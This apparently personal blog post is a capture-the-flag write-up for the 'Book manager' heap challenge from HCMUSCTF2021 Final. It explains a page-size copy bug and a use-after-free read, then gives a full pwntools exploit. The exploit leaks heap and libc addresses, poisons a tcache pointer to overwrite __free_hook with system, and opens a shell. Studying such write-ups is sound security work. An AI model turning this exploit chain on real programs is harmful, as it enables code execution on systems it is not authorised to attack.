<!DOCTYPE html>
<html lang="en"><head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1"><!-- Begin Jekyll SEO tag v2.7.1 -->
<title>Book manager writeup [HCMUSCTF2021 Final] | th3_5had0w</title>
<meta name="generator" content="Jekyll v4.2.1" />
<meta property="og:title" content="Book manager writeup [HCMUSCTF2021 Final]" />
<meta name="author" content="th3_5had0w" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="Book manager [200pts] (HCMUSCTF2021 Final)" />
<meta property="og:description" content="Book manager [200pts] (HCMUSCTF2021 Final)" />
<link rel="canonical" href="https://th3-5had0w.github.io/2021/06/07/book-manager-hcmus-writeup.html" />
<meta property="og:url" content="https://th3-5had0w.github.io/2021/06/07/book-manager-hcmus-writeup.html" />
<meta property="og:site_name" content="th3_5had0w" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2021-06-07T00:00:00+00:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="Book manager writeup [HCMUSCTF2021 Final]" />
<script type="application/ld+json">
{"description":"Book manager [200pts] (HCMUSCTF2021 Final)","@type":"BlogPosting","url":"https://th3-5had0w.github.io/2021/06/07/book-manager-hcmus-writeup.html","headline":"Book manager writeup [HCMUSCTF2021 Final]","dateModified":"2021-06-07T00:00:00+00:00","datePublished":"2021-06-07T00:00:00+00:00","author":{"@type":"Person","name":"th3_5had0w"},"mainEntityOfPage":{"@type":"WebPage","@id":"https://th3-5had0w.github.io/2021/06/07/book-manager-hcmus-writeup.html"},"@context":"https://schema.org"}</script>
<!-- End Jekyll SEO tag -->
<link rel="stylesheet" href="/assets/css/style.css">
  <link rel="icon" type="image/png" href="/assets/favicon.png" /><link type="application/atom+xml" rel="alternate" href="https://th3-5had0w.github.io/feed.xml" title="th3_5had0w" /></head>
<body><div class="site-header">
  <div class="wrapper">
    <a class="site-title" rel="author" href="/">th3_5had0w<b class="command_prompt"></b><b class="blinking_cursor">_</b></a>
    <span class="social_links">
        <a class="color-cyan-hover" href="https://twitter.com/th3_5had0w_w"><i class="fab fa-twitter-square"></i></a><a class="color-purple-hover" href="https://github.com/th3-5had0w"><i class="fab fa-github-square"></i></a>
    </span>
  </div>
</div>
<main class="page-content" aria-label="Content">
      <div class="wrapper">
        
  <div class="author-box">
    
    
        <img src="
            https://gravatar.com/avatar/4241e14141109999e63e51ba2f6eac59?s=256
        " class="author-avatar" alt="Avatar" />
    
Hi, i'm th3_5had0w, nice to meet you, welcome to my darkness kingdom, where i often solve math problems and play ctf!

</div>


<div class="post">
  <h1 class="post-title">Book manager writeup [HCMUSCTF2021 Final]</h1>
  
  <div class="post-tags">
      
      <a class="tag" href="/tag/pwn/">pwn</a>
      
      <a class="tag" href="/tag/heap exploit/">heap exploit</a>
      
  </div>
  
  <div class="post-date">Published on 07 Jun 2021</div>
  
  <h1 id="book-manager-200pts-hcmusctf2021-final">Book manager [200pts] (HCMUSCTF2021 Final)</h1>

<p><img src="https://raw.githubusercontent.com/th3-5had0w/th3-5had0w.github.io/master/public/resources/books_image1.jpg" alt="" /></p>

<blockquote>
  <p><a href="https://github.com/th3-5had0w/CTF-contests/raw/master/HCMUSCTF-Final-2021/Book_manager/book_manager">book_manager</a></p>

  <p><a href="https://github.com/th3-5had0w/CTF-contests/raw/master/HCMUSCTF-Final-2021/Book_manager/book_manager.c">source code</a></p>

  <p><a href="https://github.com/th3-5had0w/CTF-contests/raw/master/HCMUSCTF-Final-2021/Book_manager/libc-2.31.so">libc</a></p>
</blockquote>

<h2 id="the-vulnerability">The vulnerability</h2>

<p>After a while i managed to find out 2 vulnerabilities in the binary:</p>

<ul>
  <li>The binary duplicate page but does not check the size of page:
    <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">idx</span> <span class="o">=</span> <span class="n">get_int_prompt</span><span class="p">(</span><span class="s">"[+] Which book you want to copy from?: "</span><span class="p">);</span>
<span class="n">PBook</span> <span class="n">pBook</span> <span class="o">=</span> <span class="n">get_book</span><span class="p">(</span><span class="n">idx</span><span class="p">);</span>
<span class="n">idx</span> <span class="o">=</span> <span class="n">get_int_prompt</span><span class="p">(</span><span class="s">"[+] Which page you want to copy from?: "</span><span class="p">);</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">page</span> <span class="o">=</span> <span class="n">get_page</span><span class="p">(</span><span class="n">pBook</span><span class="p">,</span> <span class="n">idx</span><span class="p">);</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">new_page</span> <span class="o">=</span> <span class="n">strdup</span><span class="p">(</span><span class="n">page</span><span class="p">);</span>
<span class="o">*</span><span class="n">page_size</span> <span class="o">=</span> <span class="n">pBook</span><span class="o">-&gt;</span><span class="n">page_size</span><span class="p">[</span><span class="n">idx</span><span class="p">];</span> <span class="c1">// the vulnerability here</span>
<span class="k">return</span> <span class="n">new_page</span><span class="p">;</span>
</code></pre></div>    </div>
  </li>
  <li>The print page function allows us to print deallocated memories:
    <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">print_page</span><span class="p">()</span>
<span class="p">{</span>
  <span class="kt">int</span> <span class="n">idx</span><span class="p">;</span>
  <span class="n">idx</span> <span class="o">=</span> <span class="n">get_int_prompt</span><span class="p">(</span><span class="s">"[+] Which book you want to print?: "</span><span class="p">);</span>
  <span class="n">PBook</span> <span class="n">pBook</span> <span class="o">=</span> <span class="n">get_book</span><span class="p">(</span><span class="n">idx</span><span class="p">);</span>
  <span class="n">idx</span> <span class="o">=</span> <span class="n">get_int_prompt</span><span class="p">(</span><span class="s">"[+] Which page you want to print?: "</span><span class="p">);</span>
  <span class="k">if</span> <span class="p">(</span><span class="n">idx</span> <span class="o">&lt;</span> <span class="mi">0</span> <span class="o">||</span> <span class="n">idx</span> <span class="o">&gt;=</span> <span class="n">MAX_BOOK_PAGES</span><span class="p">)</span>
      <span class="n">hacker</span><span class="p">();</span>
  <span class="n">printf</span><span class="p">(</span><span class="s">"[+] Content: %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">pBook</span><span class="o">-&gt;</span><span class="n">page</span><span class="p">[</span><span class="n">idx</span><span class="p">]);</span> 
  <span class="c1">// read the content in page without checking if the page has been deallocated or not</span>
<span class="p">}</span>
</code></pre></div>    </div>
  </li>
</ul>

<h2 id="exploit">Exploit</h2>
<p>With the first vulnerability, i was able to overwrite the next heap’s metadata, which led to buffer overflow on the heap:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">add</span><span class="p">(</span><span class="mi">4</span><span class="p">,</span> <span class="mi">1000</span><span class="p">,</span> <span class="sa">b</span><span class="s">'A'</span><span class="o">*</span><span class="mi">4</span><span class="p">)</span> <span class="c1"># add page to book 4: b4-&gt;[0]
</span><span class="n">dup</span><span class="p">(</span><span class="mi">4</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span> <span class="c1"># duplicate page 0 of book 4: b4-&gt;[0,1]
</span><span class="n">add</span><span class="p">(</span><span class="mi">4</span><span class="p">,</span> <span class="mh">0x40</span><span class="p">,</span> <span class="sa">b</span><span class="s">'A'</span><span class="p">)</span> <span class="c1"># add target page to book 4: b4-&gt;[0,1,2]
</span><span class="n">add</span><span class="p">(</span><span class="mi">4</span><span class="p">,</span> <span class="mh">0x40</span><span class="p">,</span> <span class="sa">b</span><span class="s">'A'</span><span class="p">)</span> <span class="c1"># add dummy page to book 4: b4-&gt;[0,1,2,3]
</span><span class="n">dele</span><span class="p">(</span><span class="mi">4</span><span class="p">)</span> <span class="c1"># remove page dummy page from book 4
</span><span class="n">dele</span><span class="p">(</span><span class="mi">4</span><span class="p">)</span> <span class="c1"># remove page target page from book 4
#crafting payload
</span><span class="n">pl</span> <span class="o">=</span> <span class="sa">b</span><span class="s">'A'</span><span class="o">*</span><span class="mi">24</span><span class="o">+</span><span class="n">p64</span><span class="p">(</span><span class="mh">0x51</span><span class="p">)</span>
<span class="n">pl</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">libc_start_main</span> <span class="o">-</span> <span class="n">elf</span><span class="p">.</span><span class="n">sym</span><span class="p">[</span><span class="s">'__libc_start_main'</span><span class="p">]</span> <span class="o">+</span> <span class="mh">0x1eeb28</span><span class="o">-</span><span class="mi">8</span><span class="p">)</span>
<span class="n">pl</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="c1">#+p64(heap_base + 0x10) remove hashtag for libc 2.32
</span><span class="n">edit</span><span class="p">(</span><span class="mi">4</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="n">pl</span><span class="p">)</span> <span class="c1"># overwrite target page's forward pointer with __free_hook address
</span></code></pre></div></div>

<p>With the second vulnerability, i was able to leak heap and leak libc through main_arena (unsortedbin):</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># leak heap
</span><span class="n">add</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="sa">b</span><span class="s">'A'</span><span class="p">)</span> <span class="c1"># target
</span><span class="n">add</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="sa">b</span><span class="s">'B'</span><span class="p">)</span> <span class="c1"># dummy
</span><span class="n">dele</span><span class="p">(</span><span class="mi">2</span><span class="p">)</span> <span class="c1"># free dummy
</span><span class="n">dele</span><span class="p">(</span><span class="mi">2</span><span class="p">)</span> <span class="c1"># free target
</span><span class="n">prit</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span> <span class="c1"># print target's forward pointer
</span><span class="k">print</span><span class="p">(</span><span class="n">io</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s">'[+] Content: '</span><span class="p">))</span>
<span class="n">a</span> <span class="o">=</span> <span class="n">io</span><span class="p">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">4</span><span class="p">)</span><span class="o">+</span><span class="sa">b</span><span class="s">'</span><span class="se">\0\0\0\0</span><span class="s">'</span>
<span class="n">heap_base</span> <span class="o">=</span> <span class="n">u64</span><span class="p">(</span><span class="n">a</span><span class="p">)</span><span class="o">-</span> <span class="mh">0x2c0</span> <span class="c1"># calculate the base heap
</span><span class="n">b</span> <span class="o">=</span> <span class="nb">hex</span><span class="p">(</span><span class="n">heap_base</span><span class="p">)</span>
<span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="sa">f</span><span class="s">'Heap: </span><span class="si">{</span><span class="n">b</span><span class="si">}</span><span class="s">'</span><span class="p">)</span>
<span class="n">add</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="sa">b</span><span class="s">'A'</span><span class="p">)</span> <span class="c1"># realign heap
</span><span class="n">add</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="sa">b</span><span class="s">'B'</span><span class="p">)</span> <span class="c1"># realign heap
</span>

<span class="c1"># leak libc
</span><span class="n">add</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">2000</span><span class="p">,</span> <span class="sa">b</span><span class="s">'AAAA'</span><span class="p">)</span> <span class="c1"># target
</span><span class="n">add</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">2000</span><span class="p">,</span> <span class="sa">b</span><span class="s">'BBBB'</span><span class="p">)</span> <span class="c1"># dummy to prevent heap collision
</span><span class="n">dele</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="c1"># free target
</span><span class="n">prit</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span> <span class="c1"># print target's &lt;main_arena+96&gt; address
</span><span class="k">print</span><span class="p">(</span><span class="n">io</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s">'[+] Content: '</span><span class="p">))</span>
<span class="n">a</span><span class="o">=</span> <span class="n">io</span><span class="p">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">6</span><span class="p">)</span><span class="o">+</span><span class="sa">b</span><span class="s">'</span><span class="se">\0\0</span><span class="s">'</span>
<span class="n">libc_start_main</span> <span class="o">=</span> <span class="n">u64</span><span class="p">(</span><span class="n">a</span><span class="p">)</span><span class="o">-</span><span class="mi">1854496</span> <span class="c1"># calculate libc_start_main
</span><span class="n">add</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">2000</span><span class="p">,</span> <span class="sa">b</span><span class="s">'AAAA'</span><span class="p">)</span> <span class="c1"># realign heap
</span></code></pre></div></div>

<p>So from the two vulnerability above, we archived arbitrary write</p>

<h2 id="exploit-code">Exploit Code</h2>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span>

<span class="n">io</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="s">'./book_manager'</span><span class="p">)</span>
<span class="c1">#io = remote('61.28.237.24', 30208)
</span><span class="n">elf</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s">'/lib/x86_64-linux-gnu/libc.so.6'</span><span class="p">)</span>


<span class="k">def</span> <span class="nf">add</span><span class="p">(</span><span class="n">book_idx</span><span class="p">,</span> <span class="n">page_size</span><span class="p">,</span> <span class="n">content</span><span class="p">):</span>
    <span class="k">print</span><span class="p">(</span><span class="n">io</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s">'&gt; Your choice: '</span><span class="p">))</span>
    <span class="n">io</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="s">'1'</span><span class="p">)</span>
    <span class="k">print</span><span class="p">(</span><span class="n">io</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s">'[+] Which book you want to add a new page?: '</span><span class="p">))</span>
    <span class="n">io</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="nb">str</span><span class="p">(</span><span class="n">book_idx</span><span class="p">))</span>
    <span class="k">print</span><span class="p">(</span><span class="n">io</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s">'&gt; '</span><span class="p">))</span>
    <span class="n">io</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="s">'1'</span><span class="p">)</span>
    <span class="k">print</span><span class="p">(</span><span class="n">io</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s">'[+] New page size: '</span><span class="p">))</span>
    <span class="n">io</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="nb">str</span><span class="p">(</span><span class="n">page_size</span><span class="p">))</span>
    <span class="k">print</span><span class="p">(</span><span class="n">io</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s">'[+] Enter new content: '</span><span class="p">))</span>
    <span class="n">io</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="n">content</span><span class="p">)</span>

<span class="k">def</span> <span class="nf">dup</span><span class="p">(</span><span class="n">book_idx</span><span class="p">,</span> <span class="n">book_to_dup_from</span><span class="p">,</span> <span class="n">page_to_dup_from</span><span class="p">):</span>
    <span class="k">print</span><span class="p">(</span><span class="n">io</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s">'&gt; Your choice: '</span><span class="p">))</span>
    <span class="n">io</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="s">'1'</span><span class="p">)</span>
    <span class="k">print</span><span class="p">(</span><span class="n">io</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s">'[+] Which book you want to add a new page?: '</span><span class="p">))</span>
    <span class="n">io</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="nb">str</span><span class="p">(</span><span class="n">book_idx</span><span class="p">))</span>
    <span class="k">print</span><span class="p">(</span><span class="n">io</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s">'&gt; '</span><span class="p">))</span>
    <span class="n">io</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="s">'2'</span><span class="p">)</span>
    <span class="k">print</span><span class="p">(</span><span class="n">io</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s">'[+] Which book you want to copy from?: '</span><span class="p">))</span>
    <span class="n">io</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="nb">str</span><span class="p">(</span><span class="n">book_to_dup_from</span><span class="p">))</span>
    <span class="k">print</span><span class="p">(</span><span class="n">io</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s">'[+] Which page you want to copy from?: '</span><span class="p">))</span>
    <span class="n">io</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="nb">str</span><span class="p">(</span><span class="n">page_to_dup_from</span><span class="p">))</span>

<span class="k">def</span> <span class="nf">prit</span><span class="p">(</span><span class="n">book_idx</span><span class="p">,</span> <span class="n">page_idx</span><span class="p">):</span>
    <span class="k">print</span><span class="p">(</span><span class="n">io</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s">'&gt; Your choice: '</span><span class="p">))</span>
    <span class="n">io</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="s">'2'</span><span class="p">)</span>
    <span class="k">print</span><span class="p">(</span><span class="n">io</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s">'[+] Which book you want to print?: '</span><span class="p">))</span>
    <span class="n">io</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="nb">str</span><span class="p">(</span><span class="n">book_idx</span><span class="p">))</span>
    <span class="k">print</span><span class="p">(</span><span class="n">io</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s">'[+] Which page you want to print?: '</span><span class="p">))</span>
    <span class="n">io</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="nb">str</span><span class="p">(</span><span class="n">page_idx</span><span class="p">))</span>

<span class="k">def</span> <span class="nf">edit</span><span class="p">(</span><span class="n">book_idx</span><span class="p">,</span> <span class="n">page_idx</span><span class="p">,</span> <span class="n">content</span><span class="p">):</span>
    <span class="k">print</span><span class="p">(</span><span class="n">io</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s">'&gt; Your choice: '</span><span class="p">))</span>
    <span class="n">io</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="s">'3'</span><span class="p">)</span>
    <span class="k">print</span><span class="p">(</span><span class="n">io</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s">'[+] Which book you want to edit?: '</span><span class="p">))</span>
    <span class="n">io</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="nb">str</span><span class="p">(</span><span class="n">book_idx</span><span class="p">))</span>
    <span class="k">print</span><span class="p">(</span><span class="n">io</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s">'[+] Which page you want to edit?: '</span><span class="p">))</span>
    <span class="n">io</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="nb">str</span><span class="p">(</span><span class="n">page_idx</span><span class="p">))</span>
    <span class="k">print</span><span class="p">(</span><span class="n">io</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s">'[+] Enter new content: '</span><span class="p">))</span>
    <span class="n">io</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="n">content</span><span class="p">)</span>

<span class="k">def</span> <span class="nf">dele</span><span class="p">(</span><span class="n">book_to_delete_page_from</span><span class="p">):</span>
    <span class="k">print</span><span class="p">(</span><span class="n">io</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s">'&gt; Your choice: '</span><span class="p">))</span>
    <span class="n">io</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="s">'4'</span><span class="p">)</span>
    <span class="k">print</span><span class="p">(</span><span class="n">io</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s">'[+] Which book you want to delete page?: '</span><span class="p">))</span>
    <span class="n">io</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="nb">str</span><span class="p">(</span><span class="n">book_to_delete_page_from</span><span class="p">))</span>


<span class="c1"># leak heap
</span><span class="n">add</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="sa">b</span><span class="s">'A'</span><span class="p">)</span> <span class="c1"># target
</span><span class="n">add</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="sa">b</span><span class="s">'B'</span><span class="p">)</span> <span class="c1"># dummy
</span><span class="n">dele</span><span class="p">(</span><span class="mi">2</span><span class="p">)</span> <span class="c1"># free dummy
</span><span class="n">dele</span><span class="p">(</span><span class="mi">2</span><span class="p">)</span> <span class="c1"># free target
</span><span class="n">prit</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span> <span class="c1"># print target's forward pointer
</span><span class="k">print</span><span class="p">(</span><span class="n">io</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s">'[+] Content: '</span><span class="p">))</span>
<span class="n">a</span> <span class="o">=</span> <span class="n">io</span><span class="p">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">4</span><span class="p">)</span><span class="o">+</span><span class="sa">b</span><span class="s">'</span><span class="se">\0\0\0\0</span><span class="s">'</span>
<span class="n">heap_base</span> <span class="o">=</span> <span class="n">u64</span><span class="p">(</span><span class="n">a</span><span class="p">)</span><span class="o">-</span> <span class="mh">0x2c0</span> <span class="c1"># calculate the base heap
</span><span class="n">b</span> <span class="o">=</span> <span class="nb">hex</span><span class="p">(</span><span class="n">heap_base</span><span class="p">)</span>
<span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="sa">f</span><span class="s">'Heap: </span><span class="si">{</span><span class="n">b</span><span class="si">}</span><span class="s">'</span><span class="p">)</span>
<span class="n">add</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="sa">b</span><span class="s">'A'</span><span class="p">)</span> <span class="c1"># realign heap
</span><span class="n">add</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="sa">b</span><span class="s">'B'</span><span class="p">)</span> <span class="c1"># realign heap
</span>

<span class="c1"># leak libc
</span><span class="n">add</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">2000</span><span class="p">,</span> <span class="sa">b</span><span class="s">'AAAA'</span><span class="p">)</span> <span class="c1"># target
</span><span class="n">add</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">2000</span><span class="p">,</span> <span class="sa">b</span><span class="s">'BBBB'</span><span class="p">)</span> <span class="c1"># dummy to prevent heap collision
</span><span class="n">dele</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="c1"># free target
</span><span class="n">prit</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span> <span class="c1"># print target's &lt;main_arena+96&gt; address
</span><span class="k">print</span><span class="p">(</span><span class="n">io</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s">'[+] Content: '</span><span class="p">))</span>
<span class="n">a</span><span class="o">=</span> <span class="n">io</span><span class="p">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">6</span><span class="p">)</span><span class="o">+</span><span class="sa">b</span><span class="s">'</span><span class="se">\0\0</span><span class="s">'</span>
<span class="n">libc_start_main</span> <span class="o">=</span> <span class="n">u64</span><span class="p">(</span><span class="n">a</span><span class="p">)</span><span class="o">-</span><span class="mi">1854496</span> <span class="c1"># calculate libc_start_main
</span><span class="n">add</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">2000</span><span class="p">,</span> <span class="sa">b</span><span class="s">'AAAA'</span><span class="p">)</span> <span class="c1"># realign hea
</span>

<span class="n">add</span><span class="p">(</span><span class="mi">4</span><span class="p">,</span> <span class="mi">1000</span><span class="p">,</span> <span class="sa">b</span><span class="s">'A'</span><span class="o">*</span><span class="mi">4</span><span class="p">)</span> <span class="c1"># add page to book 4: b4-&gt;[0]
</span><span class="n">dup</span><span class="p">(</span><span class="mi">4</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span> <span class="c1"># duplicate page 0 of book 4: b4-&gt;[0,1]
</span><span class="n">add</span><span class="p">(</span><span class="mi">4</span><span class="p">,</span> <span class="mh">0x40</span><span class="p">,</span> <span class="sa">b</span><span class="s">'A'</span><span class="p">)</span> <span class="c1"># add target page to book 4: b4-&gt;[0,1,2]
</span><span class="n">add</span><span class="p">(</span><span class="mi">4</span><span class="p">,</span> <span class="mh">0x40</span><span class="p">,</span> <span class="sa">b</span><span class="s">'A'</span><span class="p">)</span> <span class="c1"># add dummy page to book 4: b4-&gt;[0,1,2,3]
</span><span class="n">dele</span><span class="p">(</span><span class="mi">4</span><span class="p">)</span> <span class="c1"># remove page dummy page from book 4
</span><span class="n">dele</span><span class="p">(</span><span class="mi">4</span><span class="p">)</span> <span class="c1"># remove page target page from book 4
#crafting payload
</span><span class="n">pl</span> <span class="o">=</span> <span class="sa">b</span><span class="s">'A'</span><span class="o">*</span><span class="mi">24</span><span class="o">+</span><span class="n">p64</span><span class="p">(</span><span class="mh">0x51</span><span class="p">)</span>
<span class="n">pl</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">libc_start_main</span> <span class="o">-</span> <span class="n">elf</span><span class="p">.</span><span class="n">sym</span><span class="p">[</span><span class="s">'__libc_start_main'</span><span class="p">]</span> <span class="o">+</span> <span class="mh">0x1eeb28</span> <span class="o">-</span> <span class="mi">8</span><span class="p">)</span> <span class="c1"># __free_hook - 8
</span><span class="n">pl</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="c1">#+p64(heap_base + 0x10) remove hashtag for libc 2.32
</span><span class="n">edit</span><span class="p">(</span><span class="mi">4</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="n">pl</span><span class="p">)</span> <span class="c1"># overwrite target page's forward pointer with __free_hook address
</span><span class="n">add</span><span class="p">(</span><span class="mi">4</span><span class="p">,</span> <span class="mh">0x40</span><span class="p">,</span> <span class="sa">b</span><span class="s">'A'</span><span class="p">)</span> <span class="c1"># malloc target heap, the next malloc will allocate memory at __free_hook
</span><span class="n">add</span><span class="p">(</span><span class="mi">4</span><span class="p">,</span> <span class="mh">0x40</span><span class="p">,</span> <span class="sa">b</span><span class="s">"/bin/sh</span><span class="se">\0</span><span class="s">"</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">libc_start_main</span><span class="o">-</span><span class="n">elf</span><span class="p">.</span><span class="n">sym</span><span class="p">[</span><span class="s">'__libc_start_main'</span><span class="p">]</span><span class="o">+</span><span class="n">elf</span><span class="p">.</span><span class="n">sym</span><span class="p">[</span><span class="s">'system'</span><span class="p">]))</span>
<span class="c1"># this step is a trick, you could also overwrite with one_gadget but you can use this trick
# if the one_gadget fails, write /bin/sh\0 to __free_hook - 8 and write system to __free_hook
</span><span class="n">dele</span><span class="p">(</span><span class="mi">4</span><span class="p">)</span> <span class="c1"># trigger system call /bin/sh
</span><span class="n">io</span><span class="p">.</span><span class="n">interactive</span><span class="p">()</span>
</code></pre></div></div>

</div>





<div class="related">
  <h2>related posts</h2>
  <ul class="related-posts">
    
      <li>
        <h3>
          <a href="/2021/09/27/downunderctf-2021.html">
            DownUnderCTF2021 Writeups
          </a>
        </h3>
      </li>
    
      <li>
        <h3>
          <a href="/2021/05/23/HCMUS-CTF-2021-writeup.html">
            HCMUS CTF 2021 writeup
          </a>
        </h3>
      </li>
    
      <li>
        <h3>
          <a href="/2021/04/08/config-dnscrypt-proxy-for-linux.html">
            How to config dnscrypt-proxy for linux?
          </a>
        </h3>
      </li>
    
  </ul>
</div>




  
  <h2>all tags</h2>
  <div class="tag-cloud"><a href="/tag/beginner/" class="set-1">beginner</a> <a href="/tag/heap-exploit/" class="set-2">heap exploit</a> <a href="/tag/introduction/" class="set-1">introduction</a> <a href="/tag/picoctf2019/" class="set-1">picoCTF2019</a> <a href="/tag/privacy/" class="set-2">privacy</a> <a href="/tag/pwn/" class="set-5">pwn</a> <a href="/tag/pwnable.tw/" class="set-2">pwnable.tw</a> <a href="/tag/tutorial/" class="set-3">tutorial</a></div>
  



      </div>
    </main><footer class="site-footer">
  <div class="wrapper">
    <div class="credits"><a href="https://github.com/bitbrain/jekyll-dash">dash</a> theme for Jekyll by <a href="https://github.com/bitbrain">bitbrain</a> made with <i class="fas fa-heart"></i><div class="toggleWrapper">
    <input type="checkbox" class="dn" id="theme-toggle" onclick="modeSwitcher()" checked />
    <label for="theme-toggle" class="toggle">
    <span class="toggle__handler">
      <span class="crater crater--1"></span>
      <span class="crater crater--2"></span>
      <span class="crater crater--3"></span>
    </span>
        <span class="star star--1"></span>
        <span class="star star--2"></span>
